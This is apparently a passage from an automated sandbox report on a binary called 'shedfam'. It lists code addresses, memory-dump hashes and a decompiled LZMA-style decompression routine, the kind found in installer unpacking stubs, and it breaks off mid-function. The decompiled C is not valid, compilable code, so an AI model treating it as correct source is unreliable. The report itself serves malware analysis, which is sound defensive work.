                                                                  0x0040641a
                                                                  0x0040641d
                                                                  0x0040641f
                                                                  0x00406425
                                                                  0x00406428
                                                                  0x0040642b
                                                                  0x0040642e
                                                                  0x00406431
                                                                  0x00406434
                                                                  0x00406437
                                                                  0x00406453
                                                                  0x00406456
                                                                  0x00406459
                                                                  0x0040645c
                                                                  0x00406463
                                                                  0x00406467
                                                                  0x00406469
                                                                  0x0040646d
                                                                  0x00406439
                                                                  0x00406439
                                                                  0x0040643d
                                                                  0x00406445
                                                                  0x0040644a
                                                                  0x0040644c
                                                                  0x0040644e
                                                                  0x0040644e
                                                                  0x00406470
                                                                  0x00406477
                                                                  0x0040647a
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406485
                                                                  0x00406485
                                                                  0x00406489
                                                                  0x00406b49
                                                                  0x00000000
                                                                  0x00406b49
                                                                  0x0040648f
                                                                  0x00406492
                                                                  0x00406495
                                                                  0x00406499
                                                                  0x0040649c
                                                                  0x004064a2
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a7
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004064b2
                                                                  0x004064b5
                                                                  0x004064b8
                                                                  0x004064bb
                                                                  0x004064be
                                                                  0x004064c1
                                                                  0x004064c4
                                                                  0x004064c7
                                                                  0x004064ca
                                                                  0x004064cd
                                                                  0x004064d0
                                                                  0x004064e8
                                                                  0x004064eb
                                                                  0x004064ee
                                                                  0x004064f1
                                                                  0x004064f1
                                                                  0x004064f4
                                                                  0x004064f8
                                                                  0x004064fa
                                                                  0x004064d2
                                                                  0x004064d2
                                                                  0x004064da
                                                                  0x004064df
                                                                  0x004064e1
                                                                  0x004064e3
                                                                  0x004064e3
                                                                  0x004064fd
                                                                  0x00406504
                                                                  0x00406507
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00406507
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406549
                                                                  0x00406549
                                                                  0x0040654d
                                                                  0x00406b55
                                                                  0x00000000
                                                                  0x00406b55
                                                                  0x00406553
                                                                  0x00406556
                                                                  0x00406559
                                                                  0x0040655d
                                                                  0x00406560
                                                                  0x00406566
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x0040656b
                                                                  0x0040656e
                                                                  0x0040656e
                                                                  0x00406574
                                                                  0x00406512
                                                                  0x00406512
                                                                  0x00406515
                                                                  0x00000000
                                                                  0x00406515
                                                                  0x00406576
                                                                  0x00406576
                                                                  0x00406579
                                                                  0x0040657c
                                                                  0x0040657f
                                                                  0x00406582
                                                                  0x00406585
                                                                  0x00406588
                                                                  0x0040658b
                                                                  0x0040658e
                                                                  0x00406591
                                                                  0x00406594
                                                                  0x004065ac
                                                                  0x004065af
                                                                  0x004065b2
                                                                  0x004065b5
                                                                  0x004065b5
                                                                  0x004065b8
                                                                  0x004065bc
                                                                  0x004065be
                                                                  0x00406596
                                                                  0x00406596
                                                                  0x0040659e
                                                                  0x004065a3
                                                                  0x004065a5
                                                                  0x004065a7
                                                                  0x004065a7
                                                                  0x004065c1
                                                                  0x004065c8
                                                                  0x004065cb
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x0040685a
                                                                  0x0040685a
                                                                  0x0040685e
                                                                  0x00406b85
                                                                  0x00000000
                                                                  0x00406b85
                                                                  0x00406864
                                                                  0x00406867
                                                                  0x0040686a
                                                                  0x0040686e
                                                                  0x00406871
                                                                  0x00406877
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x0040687c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040662a
                                                                  0x0040662a
                                                                  0x0040662d
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x00406969
                                                                  0x0040696d
                                                                  0x0040698f
                                                                  0x00406992
                                                                  0x0040699c
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040696f
                                                                  0x00406972
                                                                  0x00406976
                                                                  0x00406979
                                                                  0x00406979
                                                                  0x0040697c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a26
                                                                  0x00406a2a
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a4f
                                                                  0x00406a56
                                                                  0x00406a5d
                                                                  0x00406a5d
                                                                  0x00000000
                                                                  0x00406a5d
                                                                  0x00406a2c
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3c
                                                                  0x00406980
                                                                  0x00406980
                                                                  0x00406983
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406b17
                                                                  0x00406b1a
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406751
                                                                  0x00406753
                                                                  0x0040675a
                                                                  0x0040675b
                                                                  0x0040675d
                                                                  0x00406760
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406768
                                                                  0x0040676b
                                                                  0x0040676e
                                                                  0x00406770
                                                                  0x00406772
                                                                  0x00406772
                                                                  0x00406773
                                                                  0x00406776
                                                                  0x0040677d
                                                                  0x00406780
                                                                  0x0040678e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a64
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a73
                                                                  0x00406a73
                                                                  0x00406a77
                                                                  0x00406baf
                                                                  0x00000000
                                                                  0x00406baf
                                                                  0x00406a7d
                                                                  0x00406a80
                                                                  0x00406a83
                                                                  0x00406a87
                                                                  0x00406a8a
                                                                  0x00406a90
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a95
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a9b
                                                                  0x00406a9b
                                                                  0x00406a9f
                                                                  0x00406aff
                                                                  0x00406b02
                                                                  0x00406b07
                                                                  0x00406b08
                                                                  0x00406b0a
                                                                  0x00406b0c
                                                                  0x00406b0f
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x00406a21
                                                                  0x00406a1b
                                                                  0x00406aa1
                                                                  0x00406aa7
                                                                  0x00406aaa
                                                                  0x00406aad
                                                                  0x00406ab0
                                                                  0x00406ab3
                                                                  0x00406ab6
                                                                  0x00406ab9
                                                                  0x00406abc
                                                                  0x00406abf
                                                                  0x00406ac2
                                                                  0x00406adb
                                                                  0x00406ade
                                                                  0x00406ae1
                                                                  0x00406ae4
                                                                  0x00406ae8
                                                                  0x00406aea
                                                                  0x00406aea
                                                                  0x00406aeb
                                                                  0x00406aee
                                                                  0x00406ac4
                                                                  0x00406ac4
                                                                  0x00406acc
                                                                  0x00406ad1
                                                                  0x00406ad3
                                                                  0x00406ad6
                                                                  0x00406ad6
                                                                  0x00406af1
                                                                  0x00406af8
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406796
                                                                  0x00406799
                                                                  0x004067cf
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x00406902
                                                                  0x00406905
                                                                  0x00406907
                                                                  0x00406b91
                                                                  0x00000000
                                                                  0x00406b91
                                                                  0x0040690d
                                                                  0x00406910
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406916
                                                                  0x0040691a
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x00000000
                                                                  0x0040691d
                                                                  0x0040679b
                                                                  0x0040679d
                                                                  0x0040679f
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067a5
                                                                  0x004067a7
                                                                  0x004067a9
                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067c5
                                                                  0x004067ca
                                                                  0x00406802
                                                                  0x00406802
                                                                  0x00406806
                                                                  0x00406832
                                                                  0x00406834
                                                                  0x0040683b
                                                                  0x0040683e
                                                                  0x00406841
                                                                  0x00406841
                                                                  0x00406846
                                                                  0x00406846
                                                                  0x00406848
                                                                  0x0040684b
                                                                  0x00406852
                                                                  0x00406855
                                                                  0x00406882
                                                                  0x00406882
                                                                  0x00406885
                                                                  0x00406888
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x00000000
                                                                  0x004068fc
                                                                  0x0040688a
                                                                  0x00406890
                                                                  0x00406893
                                                                  0x00406896
                                                                  0x00406899
                                                                  0x0040689c
                                                                  0x0040689f
                                                                  0x004068a2
                                                                  0x004068a5
                                                                  0x004068a8
                                                                  0x004068ab
                                                                  0x004068c4
                                                                  0x004068c6
                                                                  0x004068c9
                                                                  0x004068ca
                                                                  0x004068cd
                                                                  0x004068cf
                                                                  0x004068d2
                                                                  0x004068d4
                                                                  0x004068d6
                                                                  0x004068d9
                                                                  0x004068db
                                                                  0x004068de
                                                                  0x004068e2
                                                                  0x004068e4
                                                                  0x004068e4
                                                                  0x004068e5
                                                                  0x004068e8
                                                                  0x004068eb
                                                                  0x004068ad
                                                                  0x004068ad
                                                                  0x004068b5
                                                                  0x004068ba
                                                                  0x004068bc
                                                                  0x004068bf
                                                                  0x004068bf
                                                                  0x004068ee
                                                                  0x004068f5
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x004068f5
                                                                  0x00406808
                                                                  0x0040680b
                                                                  0x0040680d
                                                                  0x00406810
                                                                  0x00406813
                                                                  0x00406816
                                                                  0x00406818
                                                                  0x0040681b
                                                                  0x0040681e
                                                                  0x0040681e
                                                                  0x00406821
                                                                  0x00406821
                                                                  0x00406824
                                                                  0x0040682b
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x0040682b
                                                                  0x004067b1
                                                                  0x004067b4
                                                                  0x004067b6
                                                                  0x004067b9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406518
                                                                  0x00406518
                                                                  0x0040651c
                                                                  0x00406b61
                                                                  0x00000000
                                                                  0x00406b61
                                                                  0x00406522
                                                                  0x00406525
                                                                  0x00406528
                                                                  0x0040652b
                                                                  0x0040652e
                                                                  0x00406531
                                                                  0x00406534
                                                                  0x00406536
                                                                  0x00406539
                                                                  0x0040653c
                                                                  0x0040653f
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066a3
                                                                  0x004066a3
                                                                  0x004066a7
                                                                  0x00406b6d
                                                                  0x00000000
                                                                  0x00406b6d
                                                                  0x004066ad
                                                                  0x004066b0
                                                                  0x004066b3
                                                                  0x004066b6
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066bb
                                                                  0x004066be
                                                                  0x004066c1
                                                                  0x004066c4
                                                                  0x004066c7
                                                                  0x004066ca
                                                                  0x004066cb
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066d0
                                                                  0x004066d3
                                                                  0x004066d6
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066dc
                                                                  0x004066de
                                                                  0x004066de
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406924
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040692a
                                                                  0x0040692d
                                                                  0x00406930
                                                                  0x00406933
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406938
                                                                  0x0040693b
                                                                  0x0040693e
                                                                  0x00406941
                                                                  0x00406944
                                                                  0x00406947
                                                                  0x00406948
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694d
                                                                  0x00406950
                                                                  0x00406953
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695d
                                                                  0x0040695f
                                                                  0x00406962
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x00000000
                                                                  0x004066e1
                                                                  0x00406962
                                                                  0x00406b97
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00406bce
                                                                  0x00406bce
                                                                  0x00000000
                                                                  0x00406bce
                                                                  0x00406a1b
                                                                  0x004069a2
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x004065d6

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                                                  • Instruction ID: 1046eeffc13e12efe39df9970ac10e2b765b46b26c22898380a8ab994a27db31
                                                                  • Opcode Fuzzy Hash: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                                                  • Instruction Fuzzy Hash: 307124B1D00228CBDF24CF98C8447ADBBF1FB44305F15816AD856BB281D778AA96DF54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 98%
                                                                  			E004066F0() {
                                                                  				unsigned short _t531;
                                                                  				signed int _t532;
                                                                  				void _t533;
                                                                  				signed int _t534;
                                                                  				signed int _t535;
                                                                  				signed int _t565;
                                                                  				signed int _t568;
                                                                  				signed int _t589;
                                                                  				signed int* _t606;
                                                                  				void* _t613;
                                                                  
                                                                  				L0:
                                                                  				while(1) {
                                                                  					L0:
                                                                  					if( *(_t613 - 0x40) != 0) {
                                                                  						 *(_t613 - 0x84) = 0xb;
                                                                  						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                  						goto L132;
                                                                  					} else {
                                                                  						__eax =  *(__ebp - 0x28);
                                                                  						L88:
                                                                  						 *(__ebp - 0x2c) = __eax;
                                                                  						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  						L89:
                                                                  						__eax =  *(__ebp - 4);
                                                                  						 *(__ebp - 0x80) = 0x15;
                                                                  						__eax =  *(__ebp - 4) + 0xa68;
                                                                  						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                  						L69:
                                                                  						 *(__ebp - 0x84) = 0x12;
                                                                  						while(1) {
                                                                  							L132:
                                                                  							 *(_t613 - 0x54) = _t606;
                                                                  							while(1) {
                                                                  								L133:
                                                                  								_t531 =  *_t606;
                                                                  								_t589 = _t531 & 0x0000ffff;
                                                                  								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                  								if( *(_t613 - 0xc) >= _t565) {
                                                                  									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                  									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                  									 *(_t613 - 0x40) = 1;
                                                                  									_t532 = _t531 - (_t531 >> 5);
                                                                  									 *_t606 = _t532;
                                                                  								} else {
                                                                  									 *(_t613 - 0x10) = _t565;
                                                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                  									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                  								}
                                                                  								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                  									goto L139;
                                                                  								}
                                                                  								L137:
                                                                  								if( *(_t613 - 0x6c) == 0) {
                                                                  									 *(_t613 - 0x88) = 5;
                                                                  									L170:
                                                                  									_t568 = 0x22;
                                                                  									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                  									_t535 = 0;
                                                                  									L172:
                                                                  									return _t535;
                                                                  								}
                                                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                  								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                  								L139:
                                                                  								_t533 =  *(_t613 - 0x84);
                                                                  								while(1) {
                                                                  									 *(_t613 - 0x88) = _t533;
                                                                  									while(1) {
                                                                  										L1:
                                                                  										_t534 =  *(_t613 - 0x88);
                                                                  										if(_t534 > 0x1c) {
                                                                  											break;
                                                                  										}
                                                                  										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
                                                                  											case 0:
                                                                  												if( *(_t613 - 0x6c) == 0) {
                                                                  													goto L170;
                                                                  												}
                                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  												_t534 =  *( *(_t613 - 0x70));
                                                                  												if(_t534 > 0xe1) {
                                                                  													goto L171;
                                                                  												}
                                                                  												_t538 = _t534 & 0x000000ff;
                                                                  												_push(0x2d);
                                                                  												asm("cdq");
                                                                  												_pop(_t570);
                                                                  												_push(9);
                                                                  												_pop(_t571);
                                                                  												_t609 = _t538 / _t570;
                                                                  												_t540 = _t538 % _t570 & 0x000000ff;
                                                                  												asm("cdq");
                                                                  												_t604 = _t540 % _t571 & 0x000000ff;
                                                                  												 *(_t613 - 0x3c) = _t604;
                                                                  												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                  												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                  												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                  												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                  													L10:
                                                                  													if(_t612 == 0) {
                                                                  														L12:
                                                                  														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                  														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                  														goto L15;
                                                                  													} else {
                                                                  														goto L11;
                                                                  													}
                                                                  													do {
                                                                  														L11:
                                                                  														_t612 = _t612 - 1;
                                                                  														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                  													} while (_t612 != 0);
                                                                  													goto L12;
                                                                  												}
                                                                  												if( *(_t613 - 4) != 0) {
                                                                  													GlobalFree( *(_t613 - 4));
                                                                  												}
                                                                  												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                  												 *(_t613 - 4) = _t534;
                                                                  												if(_t534 == 0) {
                                                                  													goto L171;
                                                                  												} else {
                                                                  													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                  													goto L10;
                                                                  												}
                                                                  											case 1:
                                                                  												L13:
                                                                  												__eflags =  *(_t613 - 0x6c);
                                                                  												if( *(_t613 - 0x6c) == 0) {
                                                                  													 *(_t613 - 0x88) = 1;
                                                                  													goto L170;
                                                                  												}
                                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  												_t45 = _t613 - 0x48;
                                                                  												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                  												__eflags =  *_t45;
                                                                  												L15:
                                                                  												if( *(_t613 - 0x48) < 4) {
                                                                  													goto L13;
                                                                  												}
                                                                  												_t546 =  *(_t613 - 0x40);
                                                                  												if(_t546 ==  *(_t613 - 0x74)) {
                                                                  													L20:
                                                                  													 *(_t613 - 0x48) = 5;
                                                                  													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                  													goto L23;
                                                                  												}
                                                                  												 *(_t613 - 0x74) = _t546;
                                                                  												if( *(_t613 - 8) != 0) {
                                                                  													GlobalFree( *(_t613 - 8));
                                                                  												}
                                                                  												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                  												 *(_t613 - 8) = _t534;
                                                                  												if(_t534 == 0) {
                                                                  													goto L171;
                                                                  												} else {
                                                                  													goto L20;
                                                                  												}
                                                                  											case 2:
                                                                  												L24:
                                                                  												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                  												 *(_t613 - 0x84) = 6;
                                                                  												 *(_t613 - 0x4c) = _t553;
                                                                  												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                  												L132:
                                                                  												 *(_t613 - 0x54) = _t606;
                                                                  												goto L133;
                                                                  											case 3:
                                                                  												L21:
                                                                  												__eflags =  *(_t613 - 0x6c);
                                                                  												if( *(_t613 - 0x6c) == 0) {
                                                                  													 *(_t613 - 0x88) = 3;
                                                                  													goto L170;
                                                                  												}
                                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  												_t67 = _t613 - 0x70;
                                                                  												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                  												__eflags =  *_t67;
                                                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                  												L23:
                                                                  												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                  												if( *(_t613 - 0x48) != 0) {
                                                                  													goto L21;
                                                                  												}
                                                                  												goto L24;
                                                                  											case 4:
                                                                  												L133:
                                                                  												_t531 =  *_t606;
                                                                  												_t589 = _t531 & 0x0000ffff;
                                                                  												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                  												if( *(_t613 - 0xc) >= _t565) {
                                                                  													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                  													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                  													 *(_t613 - 0x40) = 1;
                                                                  													_t532 = _t531 - (_t531 >> 5);
                                                                  													 *_t606 = _t532;
                                                                  												} else {
                                                                  													 *(_t613 - 0x10) = _t565;
                                                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                  													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                  												}
                                                                  												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                  													goto L139;
                                                                  												}
                                                                  											case 5:
                                                                  												goto L137;
                                                                  											case 6:
                                                                  												__edx = 0;
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													__eax =  *(__ebp - 4);
                                                                  													__ecx =  *(__ebp - 0x38);
                                                                  													 *(__ebp - 0x34) = 1;
                                                                  													 *(__ebp - 0x84) = 7;
                                                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                  													while(1) {
                                                                  														L132:
                                                                  														 *(_t613 - 0x54) = _t606;
                                                                  														goto L133;
                                                                  													}
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                  												__esi =  *(__ebp - 0x60);
                                                                  												__cl = 8;
                                                                  												__cl = 8 -  *(__ebp - 0x3c);
                                                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                  												__ecx =  *(__ebp - 0x3c);
                                                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                  												__ecx =  *(__ebp - 4);
                                                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                  												__eflags =  *(__ebp - 0x38) - 4;
                                                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  												if( *(__ebp - 0x38) >= 4) {
                                                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                  													if( *(__ebp - 0x38) >= 0xa) {
                                                                  														_t98 = __ebp - 0x38;
                                                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                  														__eflags =  *_t98;
                                                                  													} else {
                                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                  													}
                                                                  												} else {
                                                                  													 *(__ebp - 0x38) = 0;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                                                  												if( *(__ebp - 0x34) == __edx) {
                                                                  													__ebx = 0;
                                                                  													__ebx = 1;
                                                                  													goto L61;
                                                                  												} else {
                                                                  													__eax =  *(__ebp - 0x14);
                                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                                  														__eflags = __eax;
                                                                  													}
                                                                  													__ecx =  *(__ebp - 8);
                                                                  													__ebx = 0;
                                                                  													__ebx = 1;
                                                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                  													goto L41;
                                                                  												}
                                                                  											case 7:
                                                                  												__eflags =  *(__ebp - 0x40) - 1;
                                                                  												if( *(__ebp - 0x40) != 1) {
                                                                  													__eax =  *(__ebp - 0x24);
                                                                  													 *(__ebp - 0x80) = 0x16;
                                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  													__eax =  *(__ebp - 0x28);
                                                                  													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  													__eax =  *(__ebp - 0x2c);
                                                                  													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  													__eax = 0;
                                                                  													__eflags =  *(__ebp - 0x38) - 7;
                                                                  													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  													__al = __al & 0x000000fd;
                                                                  													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                  													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                  													__eax =  *(__ebp - 4);
                                                                  													__eax =  *(__ebp - 4) + 0x664;
                                                                  													__eflags = __eax;
                                                                  													 *(__ebp - 0x58) = __eax;
                                                                  													goto L69;
                                                                  												}
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x84) = 8;
                                                                  												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                  												while(1) {
                                                                  													L132:
                                                                  													 *(_t613 - 0x54) = _t606;
                                                                  													goto L133;
                                                                  												}
                                                                  											case 8:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													__eax =  *(__ebp - 4);
                                                                  													__ecx =  *(__ebp - 0x38);
                                                                  													 *(__ebp - 0x84) = 0xa;
                                                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                  												} else {
                                                                  													__eax =  *(__ebp - 0x38);
